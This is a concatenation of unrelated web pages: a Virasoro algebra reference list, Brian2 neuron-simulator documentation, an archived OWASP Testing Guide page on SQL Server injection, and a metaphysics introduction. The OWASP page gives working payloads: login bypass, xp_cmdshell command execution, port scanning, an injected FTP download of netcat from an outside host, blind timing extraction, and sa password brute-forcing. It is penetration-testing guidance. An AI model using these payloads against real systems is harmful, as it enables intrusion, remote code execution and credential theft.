- Antony Wassermann. Direct proofs of the Feigin-Fuchs character formula for unitary representations of the Virasoro algebra. 1012.6003. 2010. math.RT. Antony Wassermann.
Notes and References
- M. A. Virasoro . 1970 . Subsidiary conditions and ghosts in dual-resonance models . . 1 . 10 . 2933–2936. 10.1103/PhysRevD.1.2933. 1970PhRvD...1.2933V .
- 10.1007/BF01218387 . A presentation for the Virasoro and super-Virasoro algebras . Communications in Mathematical Physics. 117 . 4 . 595 . 1988. Fairlie . D. B. . Nuyts . J. . Zachos . C. K. . 1988CMaPh.117..595F . 119811901 .
- 10.1007/BF01221412 . Redundancy of conditions for a Virasoro algebra . Communications in Mathematical Physics . 122 . 1 . 171–173 . 1989 . Uretsky . J. L. . 1989CMaPh.122..171U . 119887710 .
- P. Di Francesco, P. Mathieu, and D. Sénéchal, Conformal Field Theory, 1997, .
- Krichever . I. M. . Novikov . S.P. . 1987 . Algebras of Virasoro type, Riemann surfaces and structures of the theory of solitons . Funkts. Anal. Appl. . 21 . 2. 46–63 . 10.1007/BF01078026 . 55989582 .
- 10.1016/0393-0440(94)00012-S. Super elliptic curves. Journal of Geometry and Physics. 15. 3. 252–280. 1995. Rabin . J. M. . hep-th/9302105 . 1995JGP....15..252R . 10921054. | <urn:uuid:c267e2d3-5adf-46ec-be17-375e23bd260b> | CC-MAIN-2023-14 | https://everything.explained.today/Virasoro_algebra/ | s3://commoncrawl/crawl-data/CC-MAIN-2023-14/segments/1679296950383.8/warc/CC-MAIN-20230402043600-20230402073600-00410.warc.gz | en | 0.785691 | 3,670 | 2.65625 | 3 |
It is possible to create neuron models with a spatially extended morphology, using
SpatialNeuron class. A
SpatialNeuron is a single neuron with many compartments.
Essentially, it works as a
NeuronGroup where elements are compartments instead of neurons.
SpatialNeuron is specified by a morphology (see Creating a neuron morphology) and a set of equations for
transmembrane currents (see Creating a spatially extended neuron).
Creating a neuron morphology¶
Morphologies can be created combining geometrical objects:
soma = Soma(diameter=30*um) cylinder = Cylinder(diameter=1*um, length=100*um, n=10)
The first statement creates a single iso-potential compartment (i.e. with no axial resistance within the compartment), with its area calculated as the area of a sphere with the given diameter. The second one specifies a cylinder consisting of 10 compartments with identical diameter and the given total length.
For more precise control over the geometry, you can specify the length and diameter of each individual compartment,
including the diameter at the start of the section (i.e. for
n length and
values) in a
section = Section(diameter=[6, 5, 4, 3, 2, 1]*um, length=[10, 10, 10, 5, 5]*um, n=5)
The individual compartments are modeled as truncated cones, changing the diameter linearly between the given diameters
over the length of the compartment. Note that the
diameter argument specifies the values at the nodes between the
compartments, but accessing the
diameter attribute of a
Morphology object will return the diameter at the center
of the compartment (see the note below).
The following table summarizes the different options to create schematic morphologies (the black compartment before the start of the section represents the parent compartment with diameter 15 μm, not specified in the code below):
diameter argument specifies the diameter between the compartments
(and at the beginning/end of the first/last compartment). the corresponding values can therefore be later retrieved
Morphology via the
end_diameter attributes. The
diameter attribute of a
Morphology does correspond to the diameter at the midpoint of the compartment. For a
end_diameter are of course all identical.
The tree structure of a morphology is created by attaching
Morphology objects together:
morpho = Soma(diameter=30*um) morpho.axon = Cylinder(length=100*um, diameter=1*um, n=10) morpho.dendrite = Cylinder(length=50*um, diameter=2*um, n=5)
These statements create a morphology consisting of a cylindrical axon and a dendrite attached to a spherical soma.
Note that the names
dendrite are arbitrary and chosen by the user. For example, the same morphology can
be created as follows:
morpho = Soma(diameter=30*um) morpho.output_process = Cylinder(length=100*um, diameter=1*um, n=10) morpho.input_process = Cylinder(length=50*um, diameter=2*um, n=5)
The syntax is recursive, for example two sections can be added at the end of the dendrite as follows:
morpho.dendrite.branch1 = Cylinder(length=50*um, diameter=1*um, n=3) morpho.dendrite.branch2 = Cylinder(length=50*um, diameter=1*um, n=3)
Equivalently, one can use an indexing syntax:
morpho['dendrite']['branch1'] = Cylinder(length=50*um, diameter=1*um, n=3) morpho['dendrite']['branch2'] = Cylinder(length=50*um, diameter=1*um, n=3)
The names given to sections are completely up to the user. However, names that consist of a single digit (
9) or the letters
L (for left) and
R (for right) allow for a special short syntax: they can be joined
together directly, without the needs for dots (or dictionary syntax) and therefore allow to quickly navigate through
the morphology tree (e.g.
morpho.LRLLR is equivalent to
morpho.L.R.L.L.R). This short syntax can also be used to
>>> morpho = Soma(diameter=30*um) >>> morpho.L = Cylinder(length=10*um, diameter=1*um, n=3) >>> morpho.L1 = Cylinder(length=5*um, diameter=1*um, n=3) >>> morpho.L2 = Cylinder(length=5*um, diameter=1*um, n=3) >>> morpho.L3 = Cylinder(length=5*um, diameter=1*um, n=3) >>> morpho.R = Cylinder(length=10*um, diameter=1*um, n=3) >>> morpho.RL = Cylinder(length=5*um, diameter=1*um, n=3) >>> morpho.RR = Cylinder(length=5*um, diameter=1*um, n=3)
The above instructions create a dendritic tree with two main sections, three sections attached to the first section and
two to the second. This can be verified with the
>>> morpho.topology() ( ) [root] `---| .L `---| .L.1 `---| .L.2 `---| .L.3 `---| .R `---| .R.L `---| .R.R
Note that an expression such as
morpho.L will always refer to the entire subtree. However, accessing the attributes
diameter) will only return the values for the given section.
To avoid ambiguities, do not use names for sections that can be interpreted in the abbreviated way detailed above.
For example, do not name a child section
L1 (which will be interpreted as the first child of the child
The number of compartments in a section can be accessed with
morpho.L.n, etc.), the number of
total sections and compartments in a subtree can be accessed with
For plotting purposes, it can be useful to add coordinates to a
Morphology that was created using the “schematic”
approach described above. This can be done by calling the
generate_coordinates method on a morphology,
which will return an identical morphology but with additional 2D or 3D coordinates. By default, this method creates a
morphology according to a deterministic algorithm in 2D:
new_morpho = morpho.generate_coordinates()
To get more “realistic” morphologies, this function can also be used to create morphologies in 3D where the orientation of each section differs from the orientation of the parent section by a random amount:
new_morpho = morpho.generate_coordinates(section_randomness=25)
This algorithm will base the orientation of each section on the orientation of the parent section and then randomly
perturb this orientation. More precisely, the algorithm first chooses a random vector orthogonal to the orientation
of the parent section. Then, the section will be rotated around this orthogonal vector by a random angle, drawn from an
exponential distribution with the \(\beta\) parameter (in degrees) given by
\(\beta\) parameter specifies both the mean and the standard deviation of the rotation angle. Note that no maximum
rotation angle is enforced, values for
section_randomness should therefore be reasonably small (e.g. using a
45 would already lead to a probability of ~14% that the section will be rotated by more
than 90 degrees, therefore making the section go “backwards”).
In addition, also the orientation of each compartment within a section can be randomly varied:
new_morpho = morpho.generate_coordinates(section_randomness=25, compartment_randomness=15)
The algorithm is the same as the one presented above, but applied individually to each compartment within a section (still based on the orientation on the parent section, not on the orientation of the previous compartment).
Morphologies can also be created from information about the compartment coordinates in 3D space. Such morphologies can
be loaded from a
.swc file (a standard format for neuronal morphologies; for a large database of morphologies in
this format see http://neuromorpho.org):
morpho = Morphology.from_file('corticalcell.swc')
To manually create a morphology from a list of points in a similar format to SWC files, see
Morphologies that are created in such a way will use standard names for the sections that allow for the short syntax
shown in the previous sections: if a section has one or two child sections, then they will be called
otherwise they will be numbered starting at
Morphologies with coordinates can also be created section by section, following the same syntax as for “schematic” morphologies:
soma = Soma(diameter=30*um, x=50*um, y=20*um) cylinder = Cylinder(n=10, x=[0, 100]*um, diameter=1*um) section = Section(n=5, x=[0, 10, 20, 30, 40, 50]*um, y=[0, 10, 20, 30, 40, 50]*um, z=[0, 10, 10, 10, 10, 10]*um, diameter=[6, 5, 4, 3, 2, 1]*um)
Note that the
z attributes of
SpatialNeuron will return the coordinates at the
midpoint of each compartment (as for all other attributes that vary over the length of a compartment, e.g.
distance), but during construction the coordinates refer to the start and end of the section (
respectively to the coordinates of the nodes between the compartments (
A few additional remarks:
In the majority of simulations, coordinates are not used in the neuronal equations, therefore the coordinates are purely for visualization purposes and do not affect the simulation results in any way.
Coordinate specification cannot be combined with length specification – lengths are automatically calculated from the coordinates.
The coordinate specification can also be 1- or 2-dimensional (as in the first two examples above), the unspecified coordinate will use 0 μm.
All coordinates are interpreted relative to the parent compartment, i.e. the point (0 μm, 0 μm, 0 μm) refers to the end point of the previous compartment. Most of the time, the first element of the coordinate specification is therefore 0 μm, to continue a section where the previous one ended. However, it can be convenient to use a value different from 0 μm for sections connecting to the
Somato make them (visually) connect to a point on the sphere surface instead of the center of the sphere.
Creating a spatially extended neuron¶
SpatialNeuron is a spatially extended neuron. It is created by specifying the morphology as a
Morphology object, the equations for transmembrane currents, and optionally the specific membrane capacitance
Cm and intracellular resistivity
gL = 1e-4*siemens/cm**2 EL = -70*mV eqs = ''' Im=gL * (EL - v) : amp/meter**2 I : amp (point current) ''' neuron = SpatialNeuron(morphology=morpho, model=eqs, Cm=1*uF/cm**2, Ri=100*ohm*cm) neuron.v = EL + 10*mV
Several state variables are created automatically: the
SpatialNeuron inherits all the geometrical variables of the
volume), as well as the
distance variable that gives the
distance to the soma. For morphologies that use coordinates, the
z variables are provided as well.
Additionally, a state variable
Cm is created. It is initialized with the value given at construction, but it can be
modified on a compartment per compartment basis (which is useful to model myelinated axons). The membrane potential is
stored in state variable
Note that for all variable values that vary across a compartment (e.g.
value that is reported is the value at the midpoint of the compartment.
The key state variable, which must be specified at construction, is
Im. It is the total transmembrane current,
expressed in units of current per area. This is a mandatory line in the definition of the model. The rest of the
string description may include other state variables (differential equations or subexpressions)
or parameters, exactly as in
NeuronGroup. At every timestep, Brian integrates the state variables, calculates the
transmembrane current at every point on the neuronal morphology, and updates
v using the transmembrane current and
the diffusion current, which is calculated based on the morphology and the intracellular resistivity.
Note that the transmembrane current is a surfacic current, not the total current in the compartement.
This choice means that the model equations are independent of the number of compartments chosen for the simulation.
The space and time constants can obtained for any point of the neuron with the
l = neuron.space_constant tau = neuron.time_constant
The calculation is based on the local total conductance (not just the leak conductance), therefore, it can potentially vary during a simulation (e.g. decrease during an action potential). The reported value is only correct for compartments with a cylindrical geometry, though, it does not give reasonable values for compartments with strongly varying diameter.
To inject a current
I at a particular point (e.g. through an electrode or a synapse), this current must be divided by
the area of the compartment when inserted in the transmembrane current equation. This is done automatically when
point current is specified, as in the example above. This flag can apply only to subexpressions or
parameters with amp units. Internally, the expression of the transmembrane current
Im is simply augmented with
+I/area. A current can then be injected in the first compartment of the neuron (generally the soma) as follows:
neuron.I = 1*nA
State variables of the
SpatialNeuron include all the compartments of that neuron (including subtrees).
Therefore, the statement
neuron.v = EL + 10*mV sets the membrane potential of the entire neuron at -60 mV.
Subtrees can be accessed by attribute (in the same way as in
neuron.axon.gNa = 10*gL
Note that the state variables correspond to the entire subtree, not just the main section.
That is, if the axon had branches, then the above statement would change
gNa on the main section
and all the sections in the subtree. To access the main section only, use the attribute
neuron.axon.main.gNa = 10*gL
A typical use case is when one wants to change parameter values at the soma only. For example, inserting an electrode current at the soma is done as follows:
neuron.main.I = 1*nA
A part of a section can be accessed as follows:
initial_segment = neuron.axon[10*um:50*um]
Finally, similar to the way that you can refer to a subset of neurons of a
NeuronGroup, you can also index the
SpatialNeuron object itself, e.g. to
get a group representing only the first compartment of a cell (typically the
soma), you can use:
soma = neuron
In the same way as for sections, you can also use slices, either with the indices of compartments, or with the distance from the root:
first_compartments = neurons[:3] first_compartments = neurons[0*um:30*um]
However, note that this is restricted to contiguous indices which most of the time means that all compartments indexed in this way have to be part of the same section. Such indices can be acquired directly from the morphology:
axon = neurons[morpho.axon.indices[:]]
or, more concisely:
axon = neurons[morpho.axon]
There are two methods to have synapses on
The first one to insert synaptic equations directly in the neuron equations:
eqs=''' Im = gL * (EL - v) : amp/meter**2 Is = gs * (Es - v) : amp (point current) dgs/dt = -gs/taus : siemens ''' neuron = SpatialNeuron(morphology=morpho, model=eqs, Cm=1*uF/cm**2, Ri=100*ohm*cm)
Note that, as for electrode stimulation, the synaptic current must be defined as a point current.
Then we use a
Synapses object to connect a spike source to the neuron:
S = Synapses(stimulation, neuron, on_pre='gs += w') S.connect(i=0, j=50) S.connect(i=1, j=100)
This creates two synapses, on compartments 50 and 100. One can specify the compartment number with its spatial position by indexing the morphology:
S.connect(i=0, j=morpho[25*um]) S.connect(i=1, j=morpho.axon[30*um])
In this method for creating synapses,
there is a single value for the synaptic conductance in any compartment.
This means that it will fail if there are several synapses onto the same compartment and synaptic equations
The second method, which works in such cases, is to have synaptic equations in the
eqs=''' Im = gL * (EL - v) : amp/meter**2 Is = gs * (Es - v) : amp (point current) gs : siemens ''' neuron = SpatialNeuron(morphology=morpho, model=eqs, Cm=1 * uF / cm ** 2, Ri=100 * ohm * cm) S = Synapses(stimulation, neuron, model='''dg/dt = -g/taus : siemens gs_post = g : siemens (summed)''', on_pre='g += w')
Here each synapse (instead of each compartment) has an associated value
g, and all values of
g for each compartment (i.e., all synapses targeting that compartment) are collected
into the compartmental variable
To detect and record spikes, we must specify a threshold condition, essentially in the same
way as for a
neuron = SpatialNeuron(morphology=morpho, model=eqs, threshold='v > 0*mV', refractory='v > -10*mV')
Here spikes are detected when the membrane potential
v reaches 0 mV. Because there is generally
no explicit reset in this type of model (although it is possible to specify one),
v remains above
0 mV for some time. To avoid detecting spikes during this entire time, we specify a refractory period.
In this case no spike is detected as long as
v is greater than -10 mV. Another possibility could be:
neuron = SpatialNeuron(morphology=morpho, model=eqs, threshold='m > 0.5', refractory='m > 0.4')
m is the state variable for sodium channel activation (assuming this has been defined in the
model). Here a spike is detected when half of the sodium channels are open.
With the syntax above, spikes are detected in all compartments of the neuron. To detect them in a single
compartment, use the
neuron = SpatialNeuron(morphology=morpho, model=eqs, threshold='m > 0.5', threshold_location=30, refractory='m > 0.4')
In this case, spikes are only detecting in compartment number 30. Reset then applies locally to that compartment (if a reset statement is defined). Again the location of the threshold can be specified with spatial position:
neuron = SpatialNeuron(morphology=morpho, model=eqs, threshold='m > 0.5', threshold_location=morpho.axon[30*um], refractory='m > 0.4')
In the same way that you can refer to a subset of neurons in a
you can also refer to a subset of compartments in a | <urn:uuid:be7a923c-db8c-477f-a59c-c7ca6580a682> | CC-MAIN-2023-14 | https://brian2.readthedocs.io/en/2.4.2/user/multicompartmental.html | s3://commoncrawl/crawl-data/CC-MAIN-2023-14/segments/1679296943704.21/warc/CC-MAIN-20230321162614-20230321192614-00011.warc.gz | en | 0.810204 | 4,942 | 2.859375 | 3 |
This site is the archived OWASP Foundation Wiki and is no longer accepting Account Requests.
To view the new OWASP Foundation website, please visit https://owasp.org
Testing for SQL Server
OWASP Testing Guide v3 Table of Contents
This article is part of the OWASP Testing Guide v3. The entire OWASP Testing Guide v3 can be downloaded here.
OWASP at the moment is working at the OWASP Testing Guide v4: you can browse the Guide here
- 1 Brief Summary
- 2 Short Description of the Issue
- 3 Black Box testing and example
- 3.1 SQL Server Characteristics
- 3.2 Example 1: Testing for SQL Injection in a GET request.
- 3.3 Example 2: Testing for SQL Injection in a GET request
- 3.4 Example 3: Testing in a POST request
- 3.5 Example 4: Yet another (useful) GET example
- 3.6 Example 5: custom xp_cmdshell
- 3.7 Example 6: Referer / User-Agent
- 3.8 Example 7: SQL Server as a port scanner
- 3.9 Example 8: Upload of executables
- 3.10 Obtain information when it is not displayed (Out of band)
- 3.11 Blind SQL injection attacks
- 3.12 Example 9: bruteforce of sysadmin password
- 4 References
In this section some SQL Injection techniques that utilize specific features of Microsoft SQL Server will be discussed.
Short Description of the Issue
SQL injection vulnerabilities occur whenever input is used in the construction of an SQL query without being adequately constrained or sanitized. The use of dynamic SQL (the construction of SQL queries by concatenation of strings) opens the door to these vulnerabilities. SQL injection allows an attacker to access the SQL servers and execute SQL code under the privileges of the user used to connect to the database.
As explained in SQL injection, a SQL-injection exploit requires two things: an entry point and an exploit to enter. Any user-controlled parameter that gets processed by the application might be hiding a vulnerability. This includes:
- Application parameters in query strings (e.g., GET requests)
- Application parameters included as part of the body of a POST request
- Browser-related information (e.g., user-agent, referrer)
- Host-related information (e.g., host name, IP)
- Session-related information (e.g., user ID, cookies)
Microsoft SQL server has a few unique characteristics, so some exploits need to be specially customized for this application.
Black Box testing and example
SQL Server Characteristics
To begin, let's see some SQL Server operators and commands/stored procedures that are useful in a SQL Injection test:
- comment operator: -- (useful for forcing the query to ignore the remaining portion of the original query; this won't be necessary in every case)
- query separator: ; (semicolon)
- Useful stored procedures include:
- [xp_cmdshell] executes any command shell in the server with the same permissions that it is currently running. By default, only sysadmin is allowed to use it and in SQL Server 2005 it is disabled by default (it can be enabled again using sp_configure)
- xp_regread reads an arbitrary value from the Registry (undocumented extended procedure)
- xp_regwrite writes an arbitrary value into the Registry (undocumented extended procedure)
- [sp_makewebtask] Spawns a Windows command shell and passes in a string for execution. Any output is returned as rows of text. It requires sysadmin privileges.
- [xp_sendmail] Sends an e-mail message, which may include a query result set attachment, to the specified recipients. This extended stored procedure uses SQL Mail to send the message.
Let's see now some examples of specific SQL Server attacks that use the aforementioned functions. Most of these examples will use the exec function.
Below we show how to execute a shell command that writes the output of the command dir c:\inetpub in a browseable file, assuming that the web server and the DB server reside on the same host. The following syntax uses xp_cmdshell:
exec master.dbo.xp_cmdshell 'dir c:\inetpub > c:\inetpub\wwwroot\test.txt'--
Alternatively, we can use sp_makewebtask:
exec sp_makewebtask 'C:\Inetpub\wwwroot\test.txt', 'select * from master.dbo.sysobjects'--
A successful execution will create a file that can be browsed by the pen tester. Keep in mind that sp_makewebtask is deprecated, and, even if it works in all SQL Server versions up to 2005, it might be removed in the future.
In addition, SQL Server built-in functions and environment variables are very handy. The following uses the function db_name() to trigger an error that will return the name of the database:
Notice the use of [convert]:
CONVERT ( data_type [ ( length ) ] , expression [ , style ] )
CONVERT will try to convert the result of db_name (a string) into an integer variable, triggering an error, which, if displayed by the vulnerable application, will contain the name of the DB.
The following example uses the environment variable @@version , combined with a "union select"-style injection, in order to find the version of the SQL Server.
And here's the same attack, but using again the conversion trick:
Information gathering is useful for exploiting software vulnerabilities at the SQL Server, through the exploitation of an SQL-injection attack or direct access to the SQL listener.
In the following, we show several examples that exploit SQL injection vulnerabilities through different entry points.
Example 1: Testing for SQL Injection in a GET request.
The most simple (and sometimes most rewarding) case would be that of a login page requesting an user name and password for user login. You can try entering the following string "' or '1'='1" (without double quotes):
If the application is using Dynamic SQL queries, and the string gets appended to the user credentials validation query, this may result in a successful login to the application.
Example 2: Testing for SQL Injection in a GET request
In order to learn how many columns exist
Example 3: Testing in a POST request
SQL Injection, HTTP POST Content: email=%27&whichSubmit=submit&submit.x=0&submit.y=0
A complete post example:
POST https://vulnerable.web.app/forgotpass.asp HTTP/1.1 Host: vulnerable.web.app User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:18.104.22.168) Gecko/20060909 Firefox/22.214.171.124 Paros/3.2.13 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Proxy-Connection: keep-alive Referer: http://vulnerable.web.app/forgotpass.asp Content-Type: application/x-www-form-urlencoded Content-Length: 50
The error message obtained when a ' (single quote) character is entered at the email field is:
Microsoft OLE DB Provider for SQL Server error '80040e14' Unclosed quotation mark before the character string '. /forgotpass.asp, line 15
Example 4: Yet another (useful) GET example
Obtaining the application's source code
a' ; master.dbo.xp_cmdshell ' copy c:\inetpub\wwwroot\login.aspx c:\inetpub\wwwroot\login.txt';--
Example 5: custom xp_cmdshell
All books and papers describing the security best practices for SQL Server recommend disabling xp_cmdshell in SQL Server 2000 (in SQL Server 2005 it is disabled by default). However, if we have sysadmin rights (natively or by bruteforcing the sysadmin password, see below), we can often bypass this limitation.
On SQL Server 2000:
- If xp_cmdshell has been disabled with sp_dropextendedproc, we can simply inject the following code:
- If the previous code does not work, it means that the xp_log70.dll has been moved or deleted. In this case we need to inject the following code:
CREATE PROCEDURE xp_cmdshell(@cmd varchar(255), @Wait int = 0) AS DECLARE @result int, @OLEResult int, @RunResult int DECLARE @ShellID int EXECUTE @OLEResult = sp_OACreate 'WScript.Shell', @ShellID OUT IF @OLEResult <> 0 SELECT @result = @OLEResult IF @OLEResult <> 0 RAISERROR ('CreateObject %0X', 14, 1, @OLEResult) EXECUTE @OLEResult = sp_OAMethod @ShellID, 'Run', Null, @cmd, 0, @Wait IF @OLEResult <> 0 SELECT @result = @OLEResult IF @OLEResult <> 0 RAISERROR ('Run %0X', 14, 1, @OLEResult) EXECUTE @OLEResult = sp_OADestroy @ShellID return @result
This code, written by Antonin Foller (see links at the bottom of the page), creates a new xp_cmdshell using sp_oacreate, sp_oamethod and sp_oadestroy (as long as they haven't been disabled too, of course). Before using it, we need to delete the first xp_cmdshell we created (even if it was not working), otherwise the two declarations will collide.
On SQL Server 2005, xp_cmdshell can be enabled by injecting the following code instead:
master..sp_configure 'show advanced options',1 reconfigure master..sp_configure 'xp_cmdshell',1 reconfigure
Example 6: Referer / User-Agent
The REFERER header set to:
Referer: https://vulnerable.web.app/login.aspx', 'user_agent', 'some_ip'); [SQL CODE]--
Allows the execution of arbitrary SQL Code. The same happens with the User-Agent header set to:
User-Agent: user_agent', 'some_ip'); [SQL CODE]--
Example 7: SQL Server as a port scanner
In SQL Server, one of the most useful (at least for the penetration tester) commands is OPENROWSET, which is used to run a query on another DB Server and retrieve the results. The penetration tester can use this command to scan ports of other machines in the target network, injecting the following query:
select * from OPENROWSET('SQLOLEDB','uid=sa;pwd=foobar;Network=DBMSSOCN;Address=x.y.w.z,p;timeout=5','select 1')--
This query will attempt a connection to the address x.y.w.z on port p. If the port is closed, the following message will be returned:
SQL Server does not exist or access denied
On the other hand, if the port is open, one of the following errors will be returned:
General network error. Check your network documentation
OLE DB provider 'sqloledb' reported an error. The provider did not give any information about the error.
Of course, the error message is not always available. If that is the case, we can use the response time to understand what is going on: with a closed port, the timeout (5 seconds in this example) will be consumed, whereas an open port will return the result right away.
Keep in mind that OPENROWSET is enabled by default in SQL Server 2000 but disabled in SQL Server 2005.
Example 8: Upload of executables
Once we can use xp_cmdshell (either the native one or a custom one), we can easily upload executables on the target DB Server. A very common choice is netcat.exe, but any trojan will be useful here. If the target is allowed to start FTP connections to the tester's machine, all that is needed is to inject the following queries:
exec master..xp_cmdshell 'echo open ftp.tester.org > ftpscript.txt';-- exec master..xp_cmdshell 'echo USER >> ftpscript.txt';-- exec master..xp_cmdshell 'echo PASS >> ftpscript.txt';-- exec master..xp_cmdshell 'echo bin >> ftpscript.txt';-- exec master..xp_cmdshell 'echo get nc.exe >> ftpscript.txt';-- exec master..xp_cmdshell 'echo quit >> ftpscript.txt';-- exec master..xp_cmdshell 'ftp -s:ftpscript.txt';--
At this point, nc.exe will be uploaded and available.
If FTP is not allowed by the firewall, we have a workaround that exploits the Windows debugger, debug.exe, that is installed by default in all Windows machines. Debug.exe is scriptable and is able to create an executable by executing an appropriate script file. What we need to do is to convert the executable into a debug script (which is a 100% ASCII file), upload it line by line and finally call debug.exe on it. There are several tools that create such debug files (e.g.: makescr.exe by Ollie Whitehouse and dbgtool.exe by toolcrypt.org). The queries to inject will therefore be the following:
exec master..xp_cmdshell 'echo [debug script line #1 of n] > debugscript.txt';-- exec master..xp_cmdshell 'echo [debug script line #2 of n] >> debugscript.txt';-- .... exec master..xp_cmdshell 'echo [debug script line #n of n] >> debugscript.txt';-- exec master..xp_cmdshell 'debug.exe < debugscript.txt';--
At this point, our executable is available on the target machine, ready to be executed.
There are tools that automate this process, most notably Bobcat, which runs on Windows, and Sqlninja, which runs on Unix (See the tools at the bottom of this page).
Obtain information when it is not displayed (Out of band)
Not all is lost when the web application does not return any information --such as descriptive error messages (cf. Blind SQL Injection). For example, it might happen that one has access to the source code (e.g., because the web application is based on an open source software). Then, the pen tester can exploit all the SQL injection vulnerabilities discovered offline in the web application. Although an IPS might stop some of these attacks, the best way would be to proceed as follows: develop and test the attacks in a testbed created for that purpose, and then execute these attacks against the web application being tested.
Other options for out of band attacks are described in Sample 4 above.
Blind SQL injection attacks
Trial and error
Alternatively, one may play lucky. That is the attacker may assume that there is a blind or out-of-band SQL injection vulnerability in a the web application. He will then select an attack vector (e.g., a web entry), use fuzz vectors (1) against this channel and watch the response. For example, if the web application is looking for a book using a query
select * from books where title=text entered by the user
then the penetration tester might enter the text: 'Bomba' OR 1=1- and if data is not properly validated, the query will go through and return the whole list of books. This is evidence that there is a SQL injection vulnerability. The penetration tester might later play with the queries in order to assess the criticality of this vulnerability.
If more than one error message is displayed
On the other hand, if no prior information is available, there is still a possibility of attacking by exploiting any covert channel. It might happen that descriptive error messages are stopped, yet the error messages give some information. For example:
- In some cases the web application (actually the web server) might return the traditional 500: Internal Server Error, say when the application returns an exception that might be generated, for instance, by a query with unclosed quotes.
- While in other cases the server will return a 200 OK message, but the web application will return some error message inserted by the developers Internal server error or bad data.
This one bit of information might be enough to understand how the dynamic SQL query is constructed by the web application and tune up an exploit.
Another out-of-band method is to output the results through HTTP browseable files.
There is one more possibility for making a blind SQL injection attack when there is not visible feedback from the application: by measuring the time that the web application takes to answer a request. An attack of this sort is described by Anley in () from where we take the next examples. A typical approach uses the waitfor delay command: let's say that the attacker wants to check if the 'pubs' sample database exists, he will simply inject the following command:
if exists (select * from pubs..pub_info) waitfor delay '0:0:5'
Depending on the time that the query takes to return, we will know the answer. In fact, what we have here is two things: a SQL injection vulnerability and a covert channel that allows the penetration tester to get 1 bit of information for each query. Hence, using several queries (as many queries as bits in the required information) the pen tester can get any data that is in the database. Look at the following query
declare @s varchar(8000) declare @i int select @s = db_name() select @i = [some value] if (select len(@s)) < @i waitfor delay '0:0:5'
Measuring the response time and using different values for @i, we can deduce the length of the name of the current database, and then start to extract the name itself with the following query:
if (ascii(substring(@s, @byte, 1)) & ( power(2, @bit))) > 0 waitfor delay '0:0:5'
This query will wait for 5 seconds if bit '@bit' of byte '@byte' of the name of the current database is 1, and will return at once if it is 0. Nesting two cycles (one for @byte and one for @bit) we will we able to extract the whole piece of information.
However, it might happen that the command waitfor is not available (e.g., because it is filtered by an IPS/web application firewall). This doesn't mean that blind SQL injection attacks cannot be done, as the pen tester should only come up with any time consuming operation that is not filtered. For example
declare @i int select @i = 0 while @i < 0xaffff begin select @i = @i + 1 end
Checking for version and vulnerabilities
The same timing approach can be used also to understand which version of SQL Server we are dealing with. Of course we will leverage the built-in @@version variable. Consider the following query:
On SQL Server 2005, it will return something like the following:
Microsoft SQL Server 2005 - 9.00.1399.06 (Intel X86) Oct 14 2005 00:33:37 <snip>
The '2005' part of the string spans from the 22nd to the 25th character. Therefore, one query to inject can be the following:
if substring((select @@version),25,1) = 5 waitfor delay '0:0:5'
Such query will wait 5 seconds if the 25th character of the @@version variable is '5', showing us that we are dealing with a SQL Server 2005. If the query returns immediately, we are probably dealing with SQL Server 2000, and another similar query will help to clear all doubts.
Example 9: bruteforce of sysadmin password
To bruteforce the sysadmin password, we can leverage the fact that OPENROWSET needs proper credentials to successfully perform the connection and that such a connection can be also "looped" to the local DB Server. Combining these features with an inferenced injection based on response timing, we can inject the following code:
select * from OPENROWSET('SQLOLEDB','';'sa';'<pwd>','select 1;waitfor delay ''0:0:5'' ')
What we do here is to attempt a connection to the local database (specified by the empty field after 'SQLOLEDB') using "sa" and "<pwd>" as credentials. If the password is correct and the connection is successful, the query is executed, making the DB wait for 5 seconds (and also returning a value, since OPENROWSET expects at least one column). Fetching the candidate passwords from a wordlist and measuring the time needed for each connection, we can attempt to guess the correct password. In "Data-mining with SQL Injection and Inference", David Litchfield pushes this technique even further, by injecting a piece of code in order to bruteforce the sysadmin password using the CPU resources of the DB Server itself. Once we have the sysadmin password, we have two choices:
- Inject all following queries using OPENROWSET, in order to use sysadmin privileges
- Add our current user to the sysadmin group using sp_addsrvrolemember. The current user name can be extracted using inferenced injection against the variable system_user.
Remember that OPENROWSET is accessible to all users on SQL Server 2000 but it is restricted to administrative accounts on SQL Server 2005.
- David Litchfield: "Data-mining with SQL Injection and Inference" - http://www.nextgenss.com/research/papers/sqlinference.pdf
- Chris Anley, "(more) Advanced SQL Injection" - http://www.ngssoftware.com/papers/more_advanced_sql_injection.pdf
- Steve Friedl's Unixwiz.net Tech Tips: "SQL Injection Attacks by Example" - http://www.unixwiz.net/techtips/sql-injection.html
- Alexander Chigrik: "Useful undocumented extended stored procedures" - http://www.mssqlcity.com/Articles/Undoc/UndocExtSP.htm
- Antonin Foller: "Custom xp_cmdshell, using shell object" - http://www.motobit.com/tips/detpg_cmdshell
- Paul Litwin: "Stop SQL Injection Attacks Before They Stop You" - http://msdn.microsoft.com/msdnmag/issues/04/09/SQLInjection/
- SQL Injection - http://msdn2.microsoft.com/en-us/library/ms161953.aspx
- Francois Larouche: Multiple DBMS SQL Injection tool - [SQL Power Injector]
- Northern Monkee: [Bobcat]
- icesurfer: SQL Server Takeover Tool - [sqlninja]
- Bernardo Damele A. G.: sqlmap, automatic SQL injection tool - http://sqlmap.sourceforge.net | <urn:uuid:7795b513-ed0c-47f6-931d-933d2fa32239> | CC-MAIN-2023-14 | https://wiki.owasp.org/index.php?title=Testing_for_SQL_Server&direction=next&oldid=68768 | s3://commoncrawl/crawl-data/CC-MAIN-2023-14/segments/1679296948867.32/warc/CC-MAIN-20230328135732-20230328165732-00411.warc.gz | en | 0.80826 | 5,394 | 2.53125 | 3 |
It is not easy to say what metaphysics is. Ancient and Medieval philosophers might have said that metaphysics was, like chemistry or astrology, to be defined by its subject-matter: metaphysics was the “science” that studied “being as such” or “the first causes of things” or “things that do not change”. It is no longer possible to define metaphysics that way, for two reasons. First, a philosopher who denied the existence of those things that had once been seen as constituting the subject-matter of metaphysics—first causes or unchanging things—would now be considered to be making thereby a metaphysical assertion. Second, there are many philosophical problems that are now considered to be metaphysical problems (or at least partly metaphysical problems) that are in no way related to first causes or unchanging things—the problem of free will, for example, or the problem of the mental and the physical.
